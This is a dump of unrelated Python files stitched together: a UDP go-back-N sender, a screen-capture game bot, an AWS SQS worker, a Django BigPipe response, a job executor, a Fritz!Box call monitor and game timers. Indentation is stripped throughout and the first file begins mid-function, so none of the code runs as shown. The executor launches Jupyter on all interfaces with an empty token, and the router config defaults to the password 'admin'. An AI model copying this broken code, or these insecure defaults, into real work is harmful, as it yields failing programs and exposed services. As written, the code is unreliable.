seq_no = 0
step_size = PACKET_SIZE - HEADER_SIZE
for i in range(no_of_pkts):
if no_of_pkts - 1 == i:
current_data = file_data[i*step_size:len(file_data)]
is_final = 1
else:
current_data = file_data[i*step_size:i*step_size+step_size]
is_final = 0
pkt = PacketState(seq_no, 0, is_final, current_data)
state['packets'].append(pkt)
seq_no = (seq_no + 1) % MAX_SEQ_NO
for i in range(WINDOW_SIZE):
thread = threading.Thread(target=send_packet, args=(main_socket, state['packets'][i], i, address))
thread.start()
threads.append(thread)
print('Sent first window size')
while True:
rPkt, rAddress = main_socket.recvfrom(PACKET_SIZE)
print('Received ack {}'.format(rPkt.decode()))
thread = threading.Thread(target=handle_received_packet, args=(main_socket, rPkt, rAddress))
thread.start()
threads.append(thread)
check_if_thread_finished()
def send_packet(sock, pkt, pkt_index, address):
main_lock.acquire()
if state['packets'][pkt_index].status != 2:
sock.sendto(bytes(pkt.packet, 'UTF-8'), address)
else:
main_lock.release()
return
pkt.status = 1
main_lock.release()
time.sleep(0.1)
main_lock.acquire()
if int(state['base']) == int(pkt_index) and state['packets'][pkt_index] != 2: # still didn't acknowledge, Resend
for i in range(state['base'], state['base'] + WINDOW_SIZE):
if not lose_the_packet(PLP):
thread = threading.Thread(target=send_packet, args=(sock, state['packets'][i], i, address))
thread.start()
threads.append(thread)
main_lock.release()
return
def handle_received_packet(sock, packet, address):
received_seq_no = packet.decode().split('&')[1]
main_lock.acquire()
if int(state['packets'][state['base']].seq_no) == int(received_seq_no):
state['packets'][state['base']].status = 2
state['acks_count'] += 1
state['base'] += 1
print_progress_bar(state['acks_count'], len(state['packets']))
main_lock.release()
main_lock.acquire()
base = state['base']
last_index = base + WINDOW_SIZE - 1
if state['packets'][last_index].status == 0:
main_lock.release()
thread = threading.Thread(target=send_packet, args=(sock, state['packets'][last_index], last_index, address))
thread.start()
threads.append(thread)
else:
main_lock.release()
main_lock.acquire()
if state['acks_count'] == len(state['packets']) - 1:
print('File Successfully Sent.')
main_lock.release()
return
def valid_ack(packet):
return calc_checksum(packet.decode()) == packet.decode().split('&')[0]
def check_if_thread_finished():
inactive = []
for th in threads:
if not th.is_alive():
inactive.append(th)
threads.remove(th)
for i in inactive:
i.join()
|
main.py
|
import cv2
import pyautogui
import time
import numpy as np
import keyboard
from sentdex import PressKey, ReleaseKey, W, A, S, D
import imutils
import threading
CHARACTER_POSITION = [190, 301]
CAPTURE_AREA = ((433, 400), (950, 893))
QUIT = False # We loop in-game until this is set to True.
ALLOWED_KEYS = {W, A, S, D}
# Remove the key from the list of allowed keys for a given interval.
def hold_key(key):
global ALLOWED_KEYS
ALLOWED_KEYS.remove(key)
time.sleep(0.250)
ALLOWED_KEYS.add(key)
def terminate_program():
global QUIT
QUIT = True
exit(0)
# Get the center of different objects on the image.
def get_object_locations_from_image(img, object_pixels_x, object_pixels_y, min_radius):
mask = np.zeros(img.shape, dtype=np.uint8)
mask[object_pixels_y, object_pixels_x] = [255, 255, 255]
mask = cv2.dilate(mask, None, iterations=2)
mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)
cnts = cv2.findContours(mask, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
coordinates = []
for c in cnts:
((x, y), radius) = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
if radius > min_radius: #and center[0] > CHARACTER_POSITION[0]:
coordinates.append((center[0], center[1]))
return coordinates
keyboard.add_hotkey('c', terminate_program)
time.sleep(2)
while not QUIT:
img = np.array(pyautogui.screenshot())[CAPTURE_AREA[0][1]:CAPTURE_AREA[1][1], CAPTURE_AREA[0][0]:CAPTURE_AREA[1][0], :]
# Filter the red and yellow pixels from the image.
red_vertex_indices = np.where((img[:, :, 0] > 150) & (img[:, :, 1] < 40) & (img[:, :, 1] > 20) & (img[:, :, 2] > 40))
star_vertex_indices = np.where((img[:, :, 0] > 240) & (img[:, :, 1] > 230) & (img[:, :, 2] < 90))
y_coords_apple, x_coords_apple = red_vertex_indices
y_coords_star, x_coords_star = star_vertex_indices
# Get the center points of the objects.
apple_coordinates = get_object_locations_from_image(img, x_coords_apple, y_coords_apple, min_radius=20.5)
star_coordinates = get_object_locations_from_image(img, x_coords_star, y_coords_star, min_radius=13)
OBJECTS = []
# Calculate the distance of each object relative to the character's position.
for x_coord, y_coord in apple_coordinates + star_coordinates:
OBJECTS.append({"location": (x_coord, y_coord), "distance_horizontal": (x_coord - CHARACTER_POSITION[0])})
if len(OBJECTS) > 0:
closest_objective = min(OBJECTS, key=lambda x: x["distance_horizontal"])
x, y = closest_objective["location"]
horizontal_distance = closest_objective["distance_horizontal"]
vertical_distance = (y - CHARACTER_POSITION[1])
# We only move when the object is in a given radius of our character.
if horizontal_distance < 260 and vertical_distance > -200:
# If the object is behind our character:
if x < CHARACTER_POSITION[0]:
# If there are more objects, we decide if it is safe to focus on catching the star instead of slashing forward for example.
if len(OBJECTS) > 1:
temp = list(OBJECTS)
temp.remove(closest_objective)
second_closest_objective = min(temp, key=lambda x: x["distance_horizontal"])
condition = 3 * horizontal_distance < second_closest_objective["distance_horizontal"]
else:
condition = True
if vertical_distance < 30 and vertical_distance > - 100:
# If it is safe to catch the star:
if condition:
key = A
# We don't move if it is not safe to do so. Instead, we hold the 'A' key so that we can focus on the apples in the next iteration.
else:
threading.Thread(target=hold_key, args=(key,)).start()
continue
else:
continue
elif y < CHARACTER_POSITION[1] - 45:
key = W
elif y > CHARACTER_POSITION[1] + 45:
key = S
else:
key = D
if key in ALLOWED_KEYS:
threading.Thread(target=hold_key, args=(key,)).start()
PressKey(key)
ReleaseKey(key)
|
instance.py
|
#!/usr/bin/env python
# encoding: utf-8
"""
instance.py - manage the behaviour on an individual instance
Created by Dave Williams on 2016-07-05
"""
import sys
import os
import traceback
import time
import optparse
import urllib.request
import multiprocessing as mp
import boto
from . import run
## Reporting to SQS
# This is a bit hacky and I don't like it
try:
with urllib.request.urlopen(
'http://169.254.169.254/latest/meta-data/public-ipv4',
timeout=3) as response:
ip4 = response.read().decode()
log_to_sqs=True
sqs = boto.connect_sqs()
logging_queue = sqs.get_queue('status-queue')
except urllib.error.URLError:
log_to_sqs=False
## Helper functions
def log_it(log_message):
"""Write message to console so that it can be viewed from EC2 monitor"""
identified_message = "instance.py :" + mp.current_process().name + \
" ## " + log_message
print(identified_message)
with open('/dev/console', 'w') as console:
console.write(identified_message + '\n')
if log_to_sqs:
oclock = time.strftime('%a,%H:%M') + " - "
msg = oclock + ip4 + " - "+mp.current_process().name+": "+log_message
logging_queue.write(logging_queue.new_message(msg))
def fatal_error(error_log_message, feed_me = "differently", shutdown=False):
"""Log a message likely to have torpedoed the run"""
log_it("ERROR: " + error_log_message)
log_it("SHUTTING DOWN: feed me " + feed_me + " next time")
if shutdown:
halt_system()
def running_error(exception):
"""An error that occured while running a job"""
log_it("### An error occurred while running jobs")
log_it("Exception of type " + str(type(exception)) +
": " + exception.message)
exc_type, exc_value, exc_traceback = sys.exc_info()
log_it(repr(traceback.format_exception(exc_type, exc_value, exc_traceback)))
def halt_system():
"""Shut it down"""
os.system("shutdown now -h")
## Munch tasks off a queue
class queue_eater(object):
def __init__(self, sqs_queue_name, id=None, secret=None, shutdown=True):
"""Consume an SQS queue. The queue consists of metafile locations.
These locations are spun off into run.manage instances and the queue
messages are deleted after the run.manage returns.
Parameters
----------
sqs_queue_name: string
name of the queue to eat
id: string
optional AWS id access key
secret: string
optional AWS secret key
shutdown: boolean
if True, will shutdown on errors
"""
self.name = sqs_queue_name
self.id = id
self.secret = secret
self.should_shutdown = shutdown
self._connect_to_queue()
self.new_meta() # Load first meta msg
try:
if self.meta is not None: # in case queue is empty
self.new_proc()
while self.meta is not None:
if not self.proc_alive():
if self.process.exitcode==0:
self.delete_meta()
self.new_meta()
if self.meta is not None:
self.new_proc()
except Exception as e:
running_error(e)
self.shutdown()
log_it("Ate all we can, queue eater out")
return
def _connect_to_queue(self):
"""Connect to our sqs queue"""
try:
log_it("Connecting to SQS queue "+self.name)
sqs = boto.connect_sqs(self.id, self.secret)
self.queue = sqs.get_queue(self.name)
if type(self.queue) is type(None):
raise KeyError("Provided queue name not found")
except KeyError:
fatal_error("Given queue non-existent", "a different queue name",
self.should_shutdown)
def new_proc(self):
"""Launch a new process from the current meta message"""
try:
self.message_body = self.meta.get_body()
log_it("Gonna run "+self.message_body)
self.process = mp.Process(target = run.manage,
args = (self.message_body,))
self.process.start()
self.start_time = time.time()
except Exception as e:
running_error(e)
self.shutdown()
def proc_alive(self):
"""Is the process alive?"""
if self.process.is_alive():
return True
else:
self.process.join() # wait until process really terminates
took = int(time.time() - self.start_time)
hr, min, sec = took/60/60, took/60%60, took%60
log_it("Took %i:%i:%i to run %s"%(hr, min, sec, self.message_body))
return False
def new_meta(self):
"""Read the next meta message"""
self.meta = self.queue.read()
def delete_meta(self):
"""Delete the current meta message"""
self.queue.delete_message(self.meta)
def shutdown(self):
"""Turn off instance"""
if self.should_shutdown:
log_it("Going no further, shutting down now")
halt_system()
## Many munching mouths
def multi_eaters(sqs_queue_name, num=None, id=None, secret=None, shutdown=True):
"""Launch a number of queue eaters"""
if num is None:
num = mp.cpu_count()
queue_eater_args = (sqs_queue_name, id, secret, shutdown)
eaters = [mp.Process(target=queue_eater, args = queue_eater_args) \
for i in range(num)]
[e.start() for e in eaters]
time.sleep(0.5)
while not all([not e.is_alive() for e in eaters]):
time.sleep(0.5)
[e.join() for e in eaters]
if shutdown is True:
halt_system()
## Our main man
def main(argv=None):
## Get our args from the command line if not passed directly
if argv is None:
argv = sys.argv[1:]
## Parse arguments into values
print(argv)
parser = optparse.OptionParser("Investigate options and re-call")
parser.add_option('-q', '--queue', dest="queue_name",
default="job_queue", type='string',
help='set the queue to look for commands in')
parser.add_option('-i', '--id', dest="id",
default=None, type='string',
help='what aws id credential to use')
parser.add_option('-s', '--secret', dest="secret",
default=None, type='string',
help='what aws secret key to use')
parser.add_option('-m', '--multiprocessing', action="store_const",
dest="proc_num", default=1, const=mp.cpu_count(),
help='run as many copies as there are cores [False]')
parser.add_option('--halt', action="store_true",
dest="the_end_of_the_end", default=False,
help='shutdown computer on completion or error [False]')
(options, args) = parser.parse_args(argv)
multi_eaters(options.queue_name, options.proc_num, options.id,
options.secret, options.the_end_of_the_end)
return 0 #Successful termination
if __name__ == "__main__":
sys.exit(main())
|
bigpipe_response.py
|
import enum
import json
import logging
import queue
import sys
import threading
import traceback
from django.http import StreamingHttpResponse
from django.http.response import HttpResponseBase
from bigpipe_response.bigpipe import Bigpipe
from bigpipe_response.bigpipe_render_options import BigpipeRenderOptions
from bigpipe_response.content_result import ContentResult
from bigpipe_response.debugger.bigpipe_debugger import BigpipeDebugger
class BigpipeResponse(StreamingHttpResponse):
class RenderType(enum.Enum):
TEMPLATE = enum.auto()
JAVASCRIPT = enum.auto()
JAVASCRIPT_RENDER = enum.auto()
def __init__(self, request,
render_type=RenderType.TEMPLATE,
render_source=None,
render_context={},
pagelets=[],
js_dependencies=[],
scss_dependencies=[],
i18n_dependencies=[],
render_options: BigpipeRenderOptions = None):
super().__init__(streaming_content=self.__stream_content())
if request is None:
raise ValueError('request cannot be None')
self.logger = logging.getLogger(self.__class__.__name__)
self.request = request
self.pagelets = pagelets
self.processed_js_files, self.processed_css_files = [], []
from bigpipe_response.content_loader import ContentLoader
self.content_loader = ContentLoader(render_type, render_source, render_context, render_options, js_dependencies, scss_dependencies, i18n_dependencies)
def __stream_content(self):
last_pagelet_target = None
try:
content_result = self.content_loader.load_content('body', [], [])
self.processed_js_files = self.processed_js_files + content_result.js_effected_files
self.processed_css_files = self.processed_css_files + content_result.css_effected_files
for entry_content in self.__build_bigpipe_data_main_yield(content_result):
yield entry_content
dependencies = {}
que = queue.Queue()
paglent_count = len(self.pagelets)
for pagelet in self.pagelets:
last_pagelet_target = pagelet.target
if pagelet.depends_on:
dependencies[pagelet.target] = pagelet.depends_on
threading.Thread(target=self.__process_paglet, args=(pagelet, que), daemon=True).start()
# Validate dependencies
self.__validate_deendencies(dependencies)
yield_paglets = []
yield_later = {}
for _ in range(paglent_count):
content_result_pagelet = que.get()
if not isinstance(content_result_pagelet, ContentResult):
content_result_pagelet_type = type(content_result_pagelet) if content_result_pagelet else None
self.logger.error('expected `ContentResult` got `{}` return for pagelet path `{}`'.format(content_result_pagelet_type, self.request.path))
if isinstance(content_result_pagelet, HttpResponseBase):
raise ValueError(f'pagelet with url `{content_result_pagelet.url}` Expected `ContentResult`, got `HttpResponseBase` instead')
raise content_result_pagelet
bigpipe_paglet_data = content_result_pagelet.to_dict(pagelet.target)
# Handle depends_on
# When depends_on flag is set, the result will be cached and pushed only after the dependency is loaded
target = bigpipe_paglet_data['target']
if target in dependencies:
dependent_target = dependencies.get(target)
if dependent_target not in yield_paglets:
yield_later.setdefault(dependent_target, []).append(bigpipe_paglet_data)
continue
yield_paglets.append(target)
yield self._render_paglet_content(bigpipe_paglet_data)
if target in yield_later:
for yield_pagelet_response in yield_later.get(target):
yield self._render_paglet_content(yield_pagelet_response)
del yield_later[target]
for target, yield_pagelet_response in yield_later.items():
yield self._render_paglet_content(yield_pagelet_response)
del yield_later[target]
except BaseException as ex:
self.logger.error("Error handling bigpipe response", exc_info=sys.exc_info())
if not Bigpipe.get().config.is_production_mode: # DEVELOPMENT MODE
error_target = 'Error in request source [{}]{}'.format(self.content_loader.render_source, ', on pagelet target element [{}]'.format(last_pagelet_target) if last_pagelet_target else '')
content, js, css = BigpipeDebugger.get_exception_content(error_target, (str(ex.errors) if hasattr(ex, 'errors') else str(ex)), traceback.format_exc())
i18n = {}
content_result_error = ContentResult(content, js, css, i18n, [], [], [], [])
if last_pagelet_target:
yield self._render_paglet_content(content_result_error.to_dict(last_pagelet_target))
else:
for entry_content in self.__build_bigpipe_data_main_yield(content_result_error):
yield entry_content
else:
raise ex
yield '</body></html>\n'
def __process_paglet(self, pagelet, result_queue):
try:
pagelet_response = pagelet.render()
if isinstance(pagelet_response, BigpipeResponse):
# 1. execute, and get the pagelet content.
content_result = pagelet_response.content_loader.load_content(pagelet.target, self.processed_js_files, self.processed_css_files)
# 2. build and collect ignore list of loaded. since the main request initiated.
self.processed_js_files = self.processed_js_files + content_result.js_effected_files
self.processed_css_files = self.processed_css_files + content_result.css_effected_files
# 3. build pagelet as bigpipe data
result_queue.put(content_result)
else:
logging.error('Pagelet response for target `{}` is not of type `BigpipeResponse`, will return response content. {}'.format(pagelet.target, pagelet_response))
result_queue.put(pagelet_response)
except BaseException as ex:
logging.exception(ex)
result_queue.put(ex)
#
# Yield content
#
def __build_bigpipe_data_main_yield(self, content_result: ContentResult):
if content_result.content:
yield content_result.content
if content_result.i18n:
yield '\n<script>\n\trenderI18n({})\n</script>\n'.format(json.dumps(content_result.i18n))
if content_result.css:
yield '\n<style>\n\t{}\n</style>\n'.format(content_result.css)
if content_result.js:
yield '\n<script>\n\t{}\n</script>\n'.format(content_result.js)
def _render_paglet_content(self, pagelet_content):
return """
<script id='{}'>
renderPagelet({})
</script>
""".format('script_{}'.format(pagelet_content['target']), json.dumps(pagelet_content))
def __validate_deendencies(self, dependencies: dict):
for key, value in dependencies.items():
if value in dependencies:
raise ValueError('Dependencies lock. dependency `{}` already defined'.format(value))
|
execute.py
|
import contextlib
import json
import mimetypes
import os
import subprocess
import sys
import threading
import time
import traceback
from binaryornot.check import is_binary
from collections import deque
from datetime import datetime, timedelta
from pathlib import Path
from textwrap import dedent
from .server import Server, file_hash, timestamp
class Job:
HEARTBEAT_INTERVAL = timedelta(seconds=60)
def __init__(self, host: str, job_id: int):
self.job_id = job_id
self.server = Server(host)
self.root = Path(str(job_id)).resolve()
self.root.mkdir(parents=True, exist_ok=True)
self.log_file = self.root / f'{self.job_id}.log'
self.done = threading.Event()
self.beat = threading.Thread(target=self.heartbeat)
self.beat.start()
def heartbeat(self):
def send():
try:
if self.log_file.is_file:
tail = ''.join(deque(open(self.log_file), 100))
else:
tail = ''
self.server.post(f'/executor_api/jobs/{self.job_id}/heartbeat',
json=dict(log_tail=tail))
except:
print(traceback.format_exc())
chkpt = None
while not self.done.is_set():
time.sleep(0.5)
if chkpt is None or datetime.utcnow() >= chkpt:
send()
chkpt = datetime.utcnow() + self.HEARTBEAT_INTERVAL
def download(self):
with open(self.log_file, 'at', buffering=1) as log_file:
with contextlib.redirect_stdout(log_file):
self.job = self.server.get(f'/executor_api/jobs/{self.job_id}')
job_files = self.server.get(f'/executor_api/jobs/{self.job_id}/files')
job_packages = self.server.get(f'/executor_api/jobs/{self.job_id}/packages')
(self.root / 'in').mkdir(parents=True, exist_ok=True)
(self.root / 'in' / 'params.json').write_text(
json.dumps(
{m['name'] : m['value'] for m in self.job['fields']},
ensure_ascii=False))
files = {self.root / f['name']: (self.root, f)
for f in job_files if Path(f['name']).parts[0] != 'out'}
for package in job_packages:
path = self.root / 'in' / str(package['id'])
path.mkdir(parents=True, exist_ok=True)
(path / 'label').write_text(package['label'])
(path / 'fields.json').write_text(
json.dumps(
{m['name'] : m['value'] for m in package['fields']},
ensure_ascii=False))
for p, f in files.values():
self.server.download(f, folder=p)
print(f'[{timestamp()}] Job inputs downloaded')
def execute(self):
env = os.environ.copy()
env.pop('RNDFLOW_REFRESH_TOKEN')
base_url = os.environ.get('JUPYTER_BASE_URL')
if self.job.get('is_interactive') and base_url:
script = f"$jupyter_interactive --allow-root --no-browser --ip='*' --NotebookApp.base_url={base_url} --NotebookApp.token=''"
else:
script = self.job['node']['script'] or "echo 'Empty script: nothing to do :('\nexit 1"
script_wrapper = dedent(f"""\
if ! command -v ts; then
echo "ts is not installed in the container!" > {self.job_id}.log
exit 1
fi
if ! command -v tee; then
echo "tee is not installed in the container!" > {self.job_id}.log
exit 1
fi
if command -v jupyter-lab; then
jupyter_interactive=jupyter-lab
else
jupyter_interactive=jupyter-notebook
fi
(
{script}
) 2>&1 | ts "[%Y-%m-%d %H:%M:%S]" | tee -a {self.job_id}.log
rc=${{PIPESTATUS[0]}}
exit $rc
""")
p = subprocess.run(script_wrapper, cwd=self.root, shell=True, executable="/bin/bash")
self.status = p.returncode
def upload(self):
with open(self.log_file, 'at', buffering=1) as log_file:
with contextlib.redirect_stdout(log_file):
print(f'[{timestamp()}] Uploading job output to server...')
exclude_dirs = ('in', '__pycache__', '.ipynb_checkpoints')
def enumerate_files():
for dir, dirs, files in os.walk(self.root):
path = Path(dir)
dirs[:] = [d for d in dirs
if (path / d).relative_to(self.root).parts[0] not in exclude_dirs]
for f in files:
yield path / f
def upload_files(paths):
p2h = {Path(path) : file_hash(path) for path in paths}
h2p = {h : p for p,h in p2h.items()}
links = self.server.post(f'/executor_api/jobs/{self.job_id}/upload_objects',
json={ 'objects': list(h2p.keys()) })
for item in links:
path = h2p[item['object_id']]
link = item['link']
binary = is_binary(str(path))
type,_ = mimetypes.guess_type(str(path))
if type is None:
type = 'application/x-binary' if binary else 'text/plain'
if link is not None:
with open(path, 'rb') as f:
self.server.raw_session.put(link, data=f, headers={
'Content-Type': type,
'Content-Length': str(path.stat().st_size)
}).raise_for_status()
files = []
for path,h in p2h.items():
binary = is_binary(str(path))
type,_ = mimetypes.guess_type(str(path))
if type is None:
type = 'application/x-binary' if binary else 'text/plain'
files.append(dict(
name = str(path.relative_to(self.root)),
type = type,
content_hash = h,
is_executable = os.access(path, os.X_OK),
is_binary = binary,
size = path.stat().st_size
))
return files
self.done.set()
self.beat.join()
self.server.put(f'/executor_api/jobs/{self.job_id}', json={
'status': str(self.status),
'files': upload_files(enumerate_files())
})
def __enter__(self):
self.download()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.upload()
#---------------------------------------------------------------------------
def main():
import argparse
from getpass import getpass
parser = argparse.ArgumentParser()
parser.add_argument('--host', dest='host', required=True)
parser.add_argument('--job', dest='job', required=True, type=int)
args = parser.parse_args()
if 'RNDFLOW_REFRESH_TOKEN' not in os.environ:
raise Exception('Access token not found in environment')
with Job(args.host, args.job) as job:
job.execute()
|
fritzbox_callmonitor.py
|
"""
A sensor to monitor incoming and outgoing phone calls on a Fritz!Box router.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.fritzbox_callmonitor/
"""
import logging
import socket
import threading
import datetime
import time
import re
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_HOST, CONF_PORT, CONF_NAME,
CONF_PASSWORD, CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.util import Throttle
REQUIREMENTS = ['fritzconnection==0.6.3']
_LOGGER = logging.getLogger(__name__)
CONF_PHONEBOOK = 'phonebook'
CONF_PREFIXES = 'prefixes'
DEFAULT_HOST = '169.254.1.1' # IP valid for all Fritz!Box routers
DEFAULT_NAME = 'Phone'
DEFAULT_PORT = 1012
INTERVAL_RECONNECT = 60
VALUE_CALL = 'dialing'
VALUE_CONNECT = 'talking'
VALUE_DEFAULT = 'idle'
VALUE_DISCONNECT = 'idle'
VALUE_RING = 'ringing'
# Return cached results if phonebook was downloaded less then this time ago.
MIN_TIME_PHONEBOOK_UPDATE = datetime.timedelta(hours=6)
SCAN_INTERVAL = datetime.timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default='admin'): cv.string,
vol.Optional(CONF_USERNAME, default=''): cv.string,
vol.Optional(CONF_PHONEBOOK, default=0): cv.positive_int,
vol.Optional(CONF_PREFIXES, default=[]):
vol.All(cv.ensure_list, [cv.string])
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up Fritz!Box call monitor sensor platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
phonebook_id = config.get('phonebook')
prefixes = config.get('prefixes')
try:
phonebook = FritzBoxPhonebook(
host=host, port=port, username=username, password=password,
phonebook_id=phonebook_id, prefixes=prefixes)
# pylint: disable=bare-except
except:
phonebook = None
_LOGGER.warning("Phonebook with ID %s not found on Fritz!Box",
phonebook_id)
sensor = FritzBoxCallSensor(name=name, phonebook=phonebook)
add_devices([sensor])
monitor = FritzBoxCallMonitor(host=host, port=port, sensor=sensor)
monitor.connect()
def _stop_listener(_event):
monitor.stopped.set()
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP,
_stop_listener
)
if monitor.sock is None:
return False
else:
return True
class FritzBoxCallSensor(Entity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, phonebook):
"""Initialize the sensor."""
self._state = VALUE_DEFAULT
self._attributes = {}
self._name = name
self.phonebook = phonebook
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
if self.phonebook is None:
return False
else:
return True
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self.phonebook is None:
return 'unknown'
else:
return self.phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self.phonebook is not None:
self.phonebook.update_phonebook()
class FritzBoxCallMonitor(object):
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.sock = None
self._sensor = sensor
self.stopped = threading.Event()
def connect(self):
"""Connect to the Fritz!Box."""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
try:
self.sock.connect((self.host, self.port))
threading.Thread(target=self._listen).start()
except socket.error as err:
self.sock = None
_LOGGER.error("Cannot connect to %s on port %s: %s",
self.host, self.port, err)
def _listen(self):
"""Listen to incoming or outgoing calls."""
while not self.stopped.isSet():
try:
response = self.sock.recv(2048)
except socket.timeout:
# if no response after 10 seconds, just recv again
continue
response = str(response, "utf-8")
if not response:
# if the response is empty, the connection has been lost.
# try to reconnect
self.sock = None
while self.sock is None:
self.connect()
time.sleep(INTERVAL_RECONNECT)
else:
line = response.split("\n", 1)[0]
self._parse(line)
time.sleep(1)
return
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == "RING":
self._sensor.set_state(VALUE_RING)
att = {"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime}
att["from_name"] = self._sensor.number_to_name(att["from"])
self._sensor.set_attributes(att)
elif line[1] == "CALL":
self._sensor.set_state(VALUE_CALL)
att = {"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime}
att["to_name"] = self._sensor.number_to_name(att["to"])
self._sensor.set_attributes(att)
elif line[1] == "CONNECT":
self._sensor.set_state(VALUE_CONNECT)
att = {"with": line[4], "device": [3], "accepted": isotime}
att["with_name"] = self._sensor.number_to_name(att["with"])
self._sensor.set_attributes(att)
elif line[1] == "DISCONNECT":
self._sensor.set_state(VALUE_DISCONNECT)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
class FritzBoxPhonebook(object):
"""This connects to a FritzBox router and downloads its phone book."""
def __init__(self, host, port, username, password,
phonebook_id=0, prefixes=None):
"""Initialize the class."""
self.host = host
self.username = username
self.password = password
self.port = port
self.phonebook_id = phonebook_id
self.phonebook_dict = None
self.number_dict = None
self.prefixes = prefixes or []
# pylint: disable=import-error
import fritzconnection as fc
# Establish a connection to the FRITZ!Box.
self.fph = fc.FritzPhonebook(
address=self.host, user=self.username, password=self.password)
if self.phonebook_id not in self.fph.list_phonebooks:
raise ValueError("Phonebook with this ID not found.")
self.update_phonebook()
@Throttle(MIN_TIME_PHONEBOOK_UPDATE)
def update_phonebook(self):
"""Update the phone book dictionary."""
self.phonebook_dict = self.fph.get_all_names(self.phonebook_id)
self.number_dict = {re.sub(r'[^\d\+]', '', nr): name
for name, nrs in self.phonebook_dict.items()
for nr in nrs}
_LOGGER.info("Fritz!Box phone book successfully updated")
def get_name(self, number):
"""Return a name for a given phone number."""
number = re.sub(r'[^\d\+]', '', str(number))
if self.number_dict is None:
return 'unknown'
try:
return self.number_dict[number]
except KeyError:
pass
if self.prefixes:
for prefix in self.prefixes:
try:
return self.number_dict[prefix + number]
except KeyError:
pass
try:
return self.number_dict[prefix + number.lstrip('0')]
except KeyError:
pass
return 'unknown'
|
main.py
|
from process import CustomProcess
from multiprocessing import Process
import random
import time
# Create the processes
process1 = CustomProcess('Process 1')
process2 = CustomProcess('Process 2')
process3 = CustomProcess('Process 3')
processes = [process1, process2, process3]
if __name__ == '__main__':
print('Processes are starting ...')
print('\n')
# Activate the processes
P1 = Process(target=process1.listen)
P1.start()
P2 = Process(target=process2.listen)
P2.start()
P3 = Process(target=process3.listen)
P3.start()
# Give some time to the process to finish starting
time.sleep(2.5)
print('\n')
# Generate 30 events. Which will be triggering send and receive
for e in range(30):
random_sender = random.choice(processes)
random_receiver = random.choice(processes)
random_sender.send_message(
random_receiver, {"name": f"Event {e}", "clock": random_sender.clock})
time.sleep(0.5)
# When finished terminate the program
P1.terminate()
P2.terminate()
P3.terminate()
|
mufaintervals.py
|
import time, threading
import math
import datetime
import mufadb as db
import mufabattle as mb
import mufagenerator as mg
StartTime=time.time()
def hourly_content_generation():
mg.generate_random_dungeons()
mg.dungeon_monsters_generate()
mg.global_monsters_generate()
def action() :
print('action ! -> time : {:.1f}s'.format(time.time()-StartTime))
def solve_conditions(hourly= False, tworly = False):
battlers = db.Battler.objects.no_dereference()
for b in battlers:
if isinstance(b, db.Player):
for pCharac in b.characters_list:
to_remove = []
for con in pCharac.conditions:
if con.duration == -1:
continue
else :
end_time = con.date_added + datetime.timedelta(hours =con.duration)
if (datetime.datetime.now() >= end_time):
to_remove.append(con)
for i in to_remove:
pCharac.conditions.remove(i)
if hourly:
if mb.has_condition(pCharac,"CURSED") or mb.has_condition(pCharac,"DEAD") or mb.has_condition(pCharac, "BLEEDING"):
pass
else:
pCharac.current_health = min(pCharac.vitality*10, math.ceil(pCharac.current_health+ (pCharac.vitality*0.1)))
pCharac.actions_left = pCharac.max_actions
if tworly:
pCharac.current_sanity = min(pCharac.willpower*10, math.ceil(pCharac.current_sanity+ (pCharac.willpower*0.1)))
b.updateCharacterByName(pCharac)
b.save()
elif isinstance (b, db.Monster):
pCharac = b.getCharacter()
to_remove = []
for con in pCharac.conditions:
if con.duration == -1:
continue
else :
end_time = con.date_added + datetime.timedelta(hours =con.duration)
if (datetime.datetime.now() >= end_time):
to_remove.append(con)
for i in to_remove:
pCharac.conditions.remove(i)
if hourly:
if mb.has_condition(pCharac,"CURSED") or mb.has_condition(pCharac,"DEAD") or mb.has_condition(pCharac, "BLEEDING"):
pass
else:
pCharac.current_health = min(pCharac.vitality*10, math.ceil(pCharac.current_health+ (pCharac.vitality*0.1)))
pCharac.actions_left = pCharac.max_actions
if tworly:
pCharac.current_sanity = min(pCharac.willpower*10, math.ceil(pCharac.current_sanity+ (pCharac.willpower*0.1)))
b.character_stats = pCharac
b.save()
